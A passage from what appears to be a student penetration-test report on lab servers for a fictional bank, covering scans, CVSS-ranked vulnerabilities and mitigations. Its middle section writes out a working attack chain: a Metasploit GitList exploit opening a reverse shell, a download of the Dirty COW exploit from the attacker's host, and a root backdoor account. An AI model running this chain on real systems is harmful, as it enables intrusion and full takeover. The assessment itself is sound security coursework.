|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:50:56:BE:85:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 32.07 seconds
root@kali:~#

```

Figure 11: Output of nmap vulnerability scan on port 8080

The first of these pages (`/admin/`) is shown below to be accessible without any admin user authentication occurring. Some of the available admin controls, including user management and product creation, are shown.

Figure 12: Unsecured Administrator Panel of the Sensible Furniture website

The furniture site features numerous other pages that can be interfered with, including sign up, contact us, add new item and sign in, shown below. These pages do not feature any validation, restrictions (i.e CAPTCHA challenges), allowing for database spam. In addition, sign up could potentially be used to enumerate usernames, revealing account names that could be targeted. The sign in form also does not feature any kind of protection against being interfered with. By evaluating these forms, potential attack surfaces can be established.

Figure 13: Contact form of the Sensible Furniture website

Figure 14: Registration form of the Sensible Furniture website

Figure 15: Add New Item form of the Sensible Furniture website

Figure 16: Sign in form of the Sensible Furniture website

Figure 17: User access form of the Sensible Furniture website

Again using prior knowledge that an additional web service is running in port 9000, this can be manually investigated in a browser. This returns a GitList installation as shown below. Early versions of GitList (<0.4.0) have known vulnerabilities, including the opportunity for remote code execution (Offensive Security, 2014).

Figure 18: 'GitList' website located at port 9000

Navigating to port 80 of server 2 using a web browser returned the default Apache page, indicating that this exposed web service appears to be unused. Manually checking this port helps to verify whether the service is active, abandoned, or misconfigured.

It works!

This is the default web page for this server.

The web server software is running but no content has been added, yet.

Figure 19: Default Apache page located at port 80

Lastly, web specific vulnerability scans can be put against both port 8080 and 9000, which highlights the Apache and PHP versions being used as 2.2.22 and 5.4.45 respectively. PHP 5.4.x was deemed EOL by its developers in 2015, highlighting a severely outdated installation (PHP Group, 2015). In addition, the HTTP TRACE method is shown to be active on both ports, potentially allowing for Cross-Site Tracing (XST) to occur (OWASP Foundation, 2024). These results highlight the purpose of running this scan, allowing for enumeration of web specific vulnerabilities. These insecure configurations would otherwise remaining undetected if only manual browsing occurred.

```

File Actions Edit View Help
root@kali: ~
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nikto -h http://192.168.9.130:8080
- Nikto v2.1.6
-----
+ Target IP: 192.168.9.130
+ Target Hostname: 192.168.9.130
+ Target Port: 8080
+ Start Time: 2025-11-02 05:36:42 (GMT-5)
-----
+ Server: Apache/2.2.22 (Debian)
+ Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 310280, size: 148, mtime: Sat Oct 13 18:12:02 2018
+ "/robots.txt" contains 3 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?PHPBB5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?PHP9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?PHP9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?PHP9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7924 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2025-11-02 05:36:49 (GMT-5) (7 seconds)

```

Figure 20: Output of Nikto scan on port 8080 ('Sensible Furniture')

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nikto -h http://192.168.9.130:9000
- Nikto v2.1.6
-----
+ Target IP: 192.168.9.130
+ Target Hostname: 192.168.9.130
+ Target Port: 9000
+ Start Time: 2025-11-02 05:38:21 (GMT-5)
-----
+ Server: Apache/2.2.22 (Debian)
+ Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /web/img/favicon.png, inode: 304219, size: 884, mtime: Sat Jun 14:16:21 2013
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?PHPBB5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?PHP9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?PHP9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?PHP9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /_profile/: Symfony Profiler may reveal sensitive application information.
+ 7917 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2025-11-02 05:41:25 (GMT-5) (184 seconds)
-----
+ 1 host(s) tested
root@kali:~#

```

Figure 21: Output of Nikto scan on port 9000 ('GitList')

6.1.1 Summary of Findings

A summary of all evidence gained at this stage can be collated into the table below:

Information Type	Details
Network	
IP Address	192.168.9.130
MAC Address	00:50:56:BE:85:15
Operating System	
Type	Linux
Distribution	Debian 7
Kernel	3.2.0-4-686-pae
Architecture	32-bit
Services & Ports	
SSH (22)	OpenSSH 6.0p1 Debian 4+deb7u3
HTTP (80)	Apache 2.2.22 – default Apache installation page
HTTP (8080)	Apache 2.2.22 – “Sensible Furniture” web application
HTTP (9000)	Apache 2.2.22 – GitList web application
RPC (111)	rpcbind service
RPC (45301)	status service
Web Applications	
Sensible Furniture	PHP web application with admin panel, user management and product catalogue on port 8080
GitList	Web-based Git repository browser on port 9000
Technologies	
Web Server	Apache HTTP Server 2.2.22
Programming Language	PHP 5.4.45
Frontend Framework	Bootstrap CSS framework

Table 2: Server 2 – Summary of Reconnaissance Findings

6.1.2 Vulnerabilities Summary

A summary of the vulnerabilities found in this section is displayed below:

Vulnerability	Service / Port	Discovery Method	CVE(s)	Potential Impact
Outdated/EOL Apache HTTP Version	Apache 2.2.22 – Port 80, 8080, 9000	nmap, nc, nikto	CVE-2012-3502, CVE-2012-3543, CVE-2013-1862	Remote Code Execution (RCE), DoS
Outdated/EOL SSH Version	OpenSSH 6.0p1 – Port 22	nmap, nc	CVE-2014-2653, CVE-2015-5600, CVE-2016-0777	SSH compromise
RPC Service Exposure	rpcbind	nmap, rpcinfo	N/A	Information disclosure
GitList	Port 9000	nmap, manual browsing, Metasploit	CVE-2014-4511, CVE-2018-1000533	Remote Code Execution (RCE)
Outdated/EOL PHP Version	PHP 5.x – Port 80, 8080, 9000	nikto	CVE-2015-8865, CVE-2016-5096, CVE-2016-6297	Remote Code Execution (RCE)
Directory Listing Enabled	/icons, /css, /js	nmap (http-enum script)	N/A	Information disclosure
Missing Admin Authentication	Port 8080 – /admin/, /admin/users.php	Manual browsing	N/A	Unauthorised access
Exposed Endpoints	Port 8080 – /admin/index.php etc.	nmap (http-enum script)	N/A	Expanded attack surface
Outdated Linux Kernel	Linux kernel 3.2.0	N/A	CVE-2016-5195, CVE-2017-7895, CVE-2019-14896	Privilege escalation, kernel exploits
No Brute Force Protection	Port 8080 – signin.php	Manual testing	N/A	Credentials compromise
No Account Creation Limit	Port 8080 – signup.php	Manual testing	N/A	Database spam
Insecure File Upload	Port 8080 – /admin/upload.php	Manual testing	N/A	Remote Code Execution (RCE)

Table 3: Summary of Identified Vulnerabilities

Overall, the results of Server 2’s footprinting stage reveals a wide and vulnerable attack surface. Many paths to full system compromise exist, which stem from issues like outdated software, application misconfigurations and sensitive interfaces being exposed. These findings demonstrate that Server 2, in its current state, is critically vulnerable.

6.2 Relevance of security issues found

Here, each identified vulnerability is evaluated using a CVSS scoring system (FIRST.org, 2019) in order to represent how exploitable it is, how likely it is to occur, and the possible impact it could have. This allows for relative comparison between the vulnerabilities and for a severity ranking to be determined. Below, each vulnerability is assigned a score, risk level, and rationale for how its score was decided.

The metrics that were assessed to determine the CVSS score are:

- Attack Vector - Whether the attack can occur remotely or has to be executed locally
- Attack Complexity - How convoluted the requirements are for the issue to be exploited
- Privileges Required - What level of authentication is required
- User Interaction - Whether the exploit relies on a target individual taking action
- Impact Metrics - How severe the outcome is on confidentiality, integrity and availability (CIA)

Where possible, the risks of these vulnerabilities being exploited are given in the context of Ruskin Investment Bank’s operations. Vulnerabilities are ranked in order from highest CVSS score to the lowest.

Table 4: Vulnerabilities

Vulnerability	CVSS	Risk	Rationale
GitList Remote Code Execution (Port 9000)	9.8	Critical	The most critically ranked vulnerability, this vulnerability allows for remote, unauthenticated exploitation and has low attack complexity. In addition, it requires no user interaction or credentials, resulting in a near maximum CVSS score. Demonstrated in Section 6.3, specifically crafted arguments can be sent to the target and a remote shell is returned. The outcome is total compromise of all 3 branches of the CIA triad, potentially culminating in full system takeover of Ruskin Investment Bank’s systems. This could result in data exposure or manipulation, which would likely breach regulatory requirements for the bank. Exploitation of this vulnerability directly allows for remote code execution, serving as an entry point for further compromise.
Outdated/EOL Apache HTTP Server (2.2.22)	9.7	Critical	Apache Version 2.2.22 has been EOL since 31st December 2017 and has many publicly known RCE vulnerabilities. Remote network attacks are possible which require no authentication. Exploitation approaches could include vulnerable modules being targeted or memory corruption bugs being abused. Successful exploitation of this vulnerability can result in full system compromise, allowing for actions like website defacement and data exposure to occur. Due to the simplicity and potential for severe impact, a CVSS score of 9.7 has been assigned.

Continued on next page

Table 4 (continued)

Vulnerability	CVSS	Risk	Rationale
Outdated/EOL PHP Version (5.x)	9.1	Critical	PHP Version 5.4 has been EOL since 2015, and today, has numerous RCE vulnerabilities that are attributed to it. As a result, the vector is similar to EOL Apache detailed above. Due to file uploads being permitted on the Sensible Furniture website, it potentially permits malicious PHP files to be uploaded and executed. As a result, the web application could become compromised, risking the bank's sensitive data. The CVSS score is slightly lower than those seen above due to slightly increased attack complexity and conditions.
Outdated/EOL OpenSSH Version (6.0p1)	9.1	Critical	OpenSSH Version 6.0p1 has been effectively EOL (meaning the distribution it shipped with exited LTS support) since May 2018, resulting in many CVEs relating to authentication and information disclosure. The attack complexity is low, as most attacks operate without credentials being needed. OpenSSH vulnerabilities can be exploited to weaken SSH session confidentiality, and if the protocol is compromised it greatly undermines the security of Ruskin Investment Bank's remote administration capabilities.
Insecure File Upload (/admin/upload.php)	8.8	High	This vulnerability requires authenticated admin access, increasing the privileges required metric, subsequently lowering the CVSS score. The result of unwanted files being uploaded is that malicious scripts could be executed, potentially causing data theft and tampering. Using the insecure /admin/upload.php page, a PHP script could be uploaded and executed, providing the attacker with reverse shell access.
Missing Admin Authentication (/admin/, /admin/users.php)	8.8	High	Being able to gain unauthenticated access to an administrative section of the Furniture website has a severe impact on confidentiality and integrity, due to direct access being provided to unintended resources. Due to both low complexity and a lack of credentials being required, the resulting CVSS score is high. In real terms, the result is that unintended users are able to access user management and product configuration pages, opening to potential for data manipulation or unauthorised changes being made. This opens up possible reputation damage and disruption to daily business operations.

Continued on next page

Table 4 (continued)

Vulnerability	CVSS	Risk	Rationale
Outdated Linux Kernel (3.2.0)	7.8	High	Being several major versions behind, the Linux 3.2.0 kernel is vulnerable to many CVEs, including those resulting in privilege escalation. The impact of which is high, due to successful exploitation resulting in root privileges, which would make detection and containment challenging. The privileges required are higher, with attackers generally requiring a foothold that they can escalate from, resulting in a lower CVSS score to some of the earlier vulnerabilities. With that said, the outcome is complete compromise of the system, allowing for full bypass of all controls. Therefore, the risk to the business is great, with potential for total loss of the server.
No Brute Force Protection (signin.php)	6.3	Medium	A login function without adequate protection can allow for credentials to be acquired via brute force techniques. However, the impact of this vulnerability greatly depends on password strength, as this directly contributes to the overall feasibility and chance of success. However, if successful and dependent on the privilege levels of the compromised account, further pivoting could occur. The risk to the business is that customer data or admin functions could be accessed by unintended parties.
Exposed End-points (/admin/index.php etc.)	5.5	Medium	The scan results provided enumeration of various exposed endpoints, which whilst they do not directly contribute to compromise, increase the attack surface and make it easier to launch targeted attacks. The CVSS score reflects this low complexity and low direct impact. The impact of these exposed endpoints is that they can be combined with other vulnerabilities (i.e missing authentication) in order to improve the likelihood of a successful intrusion, potentially resulting in administrative functionality being accessed by attackers.

Continued on next page

Table 4 (continued)

Vulnerability	CVSS	Risk	Rationale
RPC Service Exposure (rpcbind)	5.3	Medium	The RPC service being disclosed does not result in direct compromise, with the only outcome being information disclosure. This can give attacks greater precision, increasing their success rate, but does not directly impact the business. However, it does enable improved reconnaissance, increasing the potential precision of future attacks and creating downstream risk to Ruskin Investment Bank's operational security. A possible scenario could be for an attacker to target outdated RPC services or create more effective exploit payloads.
Directory Listing Enabled (/icons, /css, /js)	3.1	Low	With static files being revealed, the overall confidentiality impact is relatively limited. The attack vector itself is simple, requiring no authentication, but neither integrity nor availability is particularly affected. On the assumption that sensitive information is not being stored in these directories, the overall risk is low. However, it may assist attackers in better understanding the structure of the web application, which could be chained with other vulnerabilities to improve their chances at success. Therefore, whilst low severity alone, it still threatens the confidentiality of the bank's internal systems and online services.
No Account Creation Limit (signup.php)	2.8	Low	By the account creation having no validation or limits in place, a large amount of spam accounts can be trivially created with basic tools. Despite this potentially resulting indirectly in username enumeration, the impact on the CIA triad is low. The impacts on the business include possible database spam and nuisance, but is not anticipated to cause much operational disruption. However, in a financial environment, excessive new accounts being created could obscure malicious activity by creating overhead for fraud detection staff.

Table 4: CVSS-Based Risk Assessment of Identified Vulnerabilities on Server 2 – Ordered By Risk (desc.)

This ranking reflects that remote RCE vulnerabilities reflect the highest overall risk, reinforced by the referenced CVEs. Other vulnerabilities that require some form of authentication rank slightly lower, with those that only provide partial information disclosure are ranked the lowest.

Linux kernels in the range 2.6.22 - 4.8.3 are vulnerable to the Dirty COW exploit, which takes advantage of a race condition in how the 3.2.0 kernel handles writing to shared, read-only pages of memory (MITRE Corporation, 2016). The figure below shows an available Dirty COW privilege escalation exploit available on Exploit-DB. The instructions to compile and run the exploit are shown within the 40839.c file.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# searchsploit dirty_cow
-----
Exploit Title | Path
(usr/share/exploitdb/)
-----
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | exploits/linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | exploits/linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition P | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege E | exploits/linux/local/40847.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEADATA Race Condition (Write Acc | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEADATA Race Condition Privileg | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Acce | exploits/linux/local/40611.c
-----
Shellcodes: No Result
root@kali:~#
root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/40839.c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd

```

Figure 23: Contents of Dirty COW exploit with execution instructions

To access the Exploit-DB folder containing 40839.c from server 2, a HTTP server can be set up on port 8000 of the attacker machine.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# cd /usr/share/exploitdb/
root@kali:~/usr/share/exploitdb# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

```

Figure 24: Setup of HTTP server on attacker machine to host exploitdb folder

Subsequently, by rerunning the GitList RCE exploit, and upgrading to a stable shell, the exploit can be downloaded from the remote server.

```
msf5 exploit(multi/http/gitlist_arg_injection) > echo SID: 2304874
[*] exec: echo SID: 2304874

SID: 2304874
msf5 exploit(multi/http/gitlist_arg_injection) > set RHOSTS 192.168.9.130
RHOSTS => 192.168.9.130
msf5 exploit(multi/http/gitlist_arg_injection) > set RPORT 9000
RPORT => 9000
msf5 exploit(multi/http/gitlist_arg_injection) > set TARGETURI /
TARGETURI => /
msf5 exploit(multi/http/gitlist_arg_injection) > exploit

[*] Started reverse TCP handler on 192.168.9.2:4444
[*] Successfully accessed repo secret_files
[*] Sending stage (38288 bytes) to 192.168.9.130
[*] Meterpreter session 2 opened (192.168.9.2:4444 -> 192.168.9.130:39722) at 2025-11-02 05:54:04 -0500

meterpreter > shell
Process 3594 created.
Channel 0 created.

whoami
www-data

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@localhost:/home/git/repositories/secret_files$

www-data@localhost:/home/git/repositories/secret_files$ cd /tmp
cd /tmp
www-data@localhost:/tmp$

www-data@localhost:/tmp$ wget http://192.168.9.2:8000/exploits/linux/local/40839.c
<et http://192.168.9.2:8000/exploits/linux/local/40839.c
--2025-11-02 02:55:21-- http://192.168.9.2:8000/exploits/linux/local/40839.c
Connecting to 192.168.9.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/plain]
Saving to: `40839.c'

100%[=====] 5,006 --K/s in 0s

2025-11-02 02:55:21 (707 MB/s) - `40839.c' saved [5006/5006]
```

Figure 25: Upgrading of remote shell and downloading of Dirty COW exploit on server 2

Using the instructions from the exploit file, it can be compiled and run. After it has finished running, the new user 'firefart' is added with the specified password.

```
www-data@localhost:/tmp$ echo SID: 2304874
echo SID: 2304874
SID: 2304874
www-data@localhost:/tmp$ ls -la
ls -la
total 16
drwxrwxrwt 2 firefart root 4096 Nov 2 02:59 .
drwxr-xr-x 23 firefart root 4096 Oct 13 2018 ..
-rw-r----- 1 www-data www-data 0 Nov 2 02:37 2025-11-02_30nUVN
-rw-r----- 1 www-data www-data 0 Nov 2 02:36 2025-11-02_UIc3z4
-rw-r----- 1 www-data www-data 0 Nov 2 02:35 2025-11-02_kCxEMz
-rw-r--r-- 1 www-data www-data 5006 Jan 1 2020 40839.c
www-data@localhost:/tmp$ gcc -pthread 40839.c -o dirtycow -lcrypt
gcc -pthread 40839.c -o dirtycow -lcrypt
www-data@localhost:/tmp$ ls -la
ls -la
total 28
drwxrwxrwt 2 firefart root 4096 Nov 2 03:00 .
drwxr-xr-x 23 firefart root 4096 Oct 13 2018 ..
-rw-r----- 1 www-data www-data 0 Nov 2 02:37 2025-11-02_30nUVN
-rw-r----- 1 www-data www-data 0 Nov 2 02:36 2025-11-02_UIc3z4
-rw-r----- 1 www-data www-data 0 Nov 2 02:35 2025-11-02_kCxEMz
-rw-r--r-- 1 www-data www-data 5006 Jan 1 2020 40839.c
-rwxr-xr-x 1 www-data www-data 9598 Nov 2 03:00 dirtycow
www-data@localhost:/tmp$

www-data@localhost:/tmp$ ./dirtycow
./dirtycow
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password

Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash

mmap: b76f3000
```

Figure 26: Compilation and execution of Dirty COW exploit on server 2

After switching to the 'fireart' user, it's root level permissions can then be verified in several ways for completeness. This is shown below by the result of the `id` command, showing UID 0 root privileges. This provides definitive proof of Server 2 being fully compromised.

```
Complete line:
fireart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash

mmap: b76f3000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'fireart' and the password 'password'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@localhost:/tmp$ madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'fireart' and the password 'password'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

www-data@localhost:/tmp$ su fireart
su fireart
Password: password

fireart@localhost:/tmp# whoami
whoami
fireart
fireart@localhost:/tmp#

fireart@localhost:/tmp# id
id
uid=0(fireart) gid=0(root) groups=0(root)
fireart@localhost:/tmp#

fireart@localhost:/tmp# id -u
id -u
0
fireart@localhost:/tmp#

fireart@localhost:/tmp# echo SID: 2304874
echo SID: 2304874
SID: 2304874
fireart@localhost:/tmp#
```

Figure 27: Successful exploitation of Dirty COW exploit and evidence of root-level access

This exploit creates a persistent entry point into Server 2, with the creation of a new privileged user and specified password. This operates as a backdoor, allowing for future administrative access, even if the GitList application and Linux kernel are patched. In a real scenario, this would allow for stealthy, long term control over the compromised system.

6.4 Research into possible exploit mitigation & recommendations

The vulnerabilities, and subsequent exploits, can be mitigated by following proven, industry aligned strategies. The below recommendations were chosen by reviewing the CVSS score assigned to each vulnerability and aligning this with cybersecurity best practices.

These recommendations can be split into two categories, technical and non-technical. The former represents actions like patching old software, modifying configuration files and upgrading outdated protocols. Non-technical recommendations make up strategies like changing policies, refining training and tightening monitoring efforts. The desirable outcome of which is to reduce the potential attack surface and improve the security of Ruskin Investment Bank's infrastructure.

Outdated / EOL Apache 2.2.22

The key mitigation strategy for outdated and end-of-life software is to update it to a version that is still being maintained. This is inline with the vendor guidance (Apache Software

Foundation, 2017), which states that unsupported versions should not be used. If this is not immediately possible, due to dependencies or stability concerns, security fixes can be backported to the existing version to reduce the potential risks in the short term. To ensure the vulnerability remains managed over time, a software management strategy should be put in place, such as NIST SI-2 (National Institute of Standards and Technology, 2020). In terms of other recommendations, the unencrypted HTTP protocol should be avoided in favour of HTTPS, to protect traffic from eavesdropping and interception (OWASP Foundation, 2019).

Outdated / EOL SSH Version

Similarly, the threats against the outdated SSH version can be mitigated in the same way as Apache. By upgrading to a newer, patched version that is still receiving security fixes, the CVEs that apply to OpenSSH 6.0p1 can be protected against. This is in line with vendor guidance (OpenSSH Project, 2012). As for other recommendations, configuration changes that can be made include disabling weak or deprecated ciphers, and enforcing key based authentication for all sessions, as recommended in the CIS SSH Server Benchmark for Debian Linux (Center for Internet Security, 2024). Lastly, periodically auditing the configuration of the SSH service would ensure that any deprecated protocol settings are not introduced or left behind from future updates.

RPC Service Exposure

A mitigation strategy for the RPC Service Exposure is to restrict its access using a host-based firewall, thereby only allowing for trusted internal hosts to interact with the service. This guidance is in line with NIST SP 800-53 control AC-4, which enforces the authorised flow of information between systems and components (National Institute of Standards and Technology, 2020). In addition, disabling all but the absolutely necessary RPC programs will result in a reduced attack surface, minimising potential avenues of attack. Out of these two recommendations, the firewall would likely be most preferable as disabling parts of the RPC service may impact essential functionality required for the bank's operations. Ongoing monitoring of RPC activity, with logging and review of unexpected queries, will ensure that potential attacks are thwarted early.

GitList

Much of the risk associated with the GitList application is caused by it being an outdated version. As a result, patching with a newer version, and maintaining frequent updates with a software management strategy, will mitigate this risk. Further steps to harden the security in this area could include removal of the application if it is not needed for Ruskin Investment Bank's business function, in line with NIST CM-7 (Least Functionality) guidance (National Institute of Standards and Technology, 2020).

Outdated / EOL PHP Version

As before, vulnerabilities that apply to Server 2's EOL PHP version can be mitigated by upgrading to a version that is still receiving security patches. To prevent the vulnerability occurring again, a patch management strategy can be adopted. A recommendation specific to PHP is to disable functions that are deemed 'dangerous' (such as **shell_exec**, **exec** and **system**), as recommended in OWASP's PHP Configuration guide (OWASP Foundation, 2021). A non-technical recommendation could include creating a training plan for developers that teaches secure coding practices, which would lower the chances of dangerous functions being implemented during future projects.

Directory Listing Enabled

To combat vulnerabilities caused by directory listing being enabled, this can be disabled within Apache configuration (Apache Software Foundation, 2024). Per OWASP ASVS 1.1 (Secure Deployment) (OWASP Foundation, 2019), it's imperative too that any sensitive files are placed outside of the web application's root directory. Furthermore, any directories that remain exposed can be reviewed to ensure that no unintentionally accessible files pose a threat.

Missing Admin Authentication

To adequately harden the security of administration areas, authentication should be enforced on all admin endpoints, as recommended by OWASP (OWASP Foundation, 2019). To ensure these areas remain secure, attempts to log in to admin areas can be logged and routinely monitored for malicious activity. In addition, a policy should be introduced for authentication to be enforced on any new interfaces that are developed, ensuring security and consistency across future applications.

Exposed Endpoints

As outlined by OWASP ASVS 1.5 (Access Control), endpoints should have proper access controls in place, in order to prevent enumeration (OWASP Foundation, 2019).

Outdated Linux Kernel

Similarly to outdated software vulnerabilities, an outdated Linux kernel can be updated and maintained in order to eliminate the associated privilege escalation flaws. Risks associated with privilege escalation can also be mitigated by limiting shell access capabilities for web service accounts. To prevent recurrence of this issue, a lifecycle management policy should be established for the operating system, ensuring that the kernel is proactively upgraded when it is approaching end-of-life.

No Brute Force Protection

Some simple mitigation techniques for brute forces include rate-limiting login attempts or automatically throttling particular IP addresses that are showing signs of automated attacks. These are the most practical recommendations, as they reduce the risk of automated attacks without affecting the experience for legitimate users. Alternatively, CAPTCHA challenges can be employed to prevent scripted login attempts, but can introduce frustration for users. If a particular account is being targeted, forcing an account lockout after a certain number of attempts can halt an intrusion attempt.

No Account Creation Limit

Sign up spam can be greatly slowed by implementing CAPTCHA challenges within the associated form. Additionally, requiring email verification for new accounts can prevent mass generation using invalid emails. A non-technical recommendation could be for administrators to periodically review newly created accounts in an attempt to detect erroneous registration patterns.

Insecure File Upload

Some methods to protect against malicious files being uploaded could include storing user uploads outside of the root web directory, with this separation offering some protection against direct execution. In addition, file type restrictions could be made more robust by implementing

server-side validation, as opposed to just checking the file extension. To complement these technical recommendations, Ruskin Investment Bank's developers should adopt secure file handling practices during their development stages, to ensure that any future upload functionality is designed with security in mind.

7 Second Server

7.1 Depth of understanding gleaned from footprinting and vulnerabilities detected

The scanning of server 7 begins from the same stage as server 2, with the result of the below `nmap -sn` command showing server 7 as being online with the IP address `192.168.9.128`.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -sn 192.168.9.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:29 EDT
Nmap scan report for 192.168.9.1
Host is up (0.00075s latency).
MAC Address: 00:50:56:9A:63:AC (VMware)
Nmap scan report for 192.168.9.128
Host is up (0.00019s latency).
MAC Address: 00:50:56:BE:78:2D (VMware)
Nmap scan report for 192.168.9.129
Host is up (0.00016s latency).
MAC Address: 00:50:56:BE:0C:03 (VMware)
Nmap scan report for 192.168.9.130
Host is up (0.00017s latency).
MAC Address: 00:50:56:BE:85:15 (VMware)
Nmap scan report for 192.168.9.131
Host is up (0.00015s latency).
MAC Address: 00:50:56:B0:C6:BC (VMware)
Nmap scan report for 192.168.9.132
Host is up (0.00017s latency).
MAC Address: 00:50:56:BE:E0:BD (VMware)
Nmap scan report for 192.168.9.133
Host is up (0.00018s latency).
MAC Address: 00:50:56:BE:17:E6 (VMware)
Nmap scan report for 192.168.9.134
Host is up (0.00017s latency).
MAC Address: 00:50:56:BE:1D:77 (VMware)
Nmap scan report for 192.168.9.135
Host is up (0.00016s latency).
MAC Address: 00:50:56:BE:23:1B (VMware)
Nmap scan report for 192.168.9.2
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 1.91 seconds
root@kali:~#
```

Figure 28: Result of `nmap -sn` command

The operating system can again be determined using the `nmap` command. Seen below, the results of the scan indicate the version as Linux 3.2-3.16.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -O 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-11-28 03:43 EST
Nmap scan report for 192.168.9.128
Host is up (0.000062s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
MAC Address: 00:50:56:BE:78:2D (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop

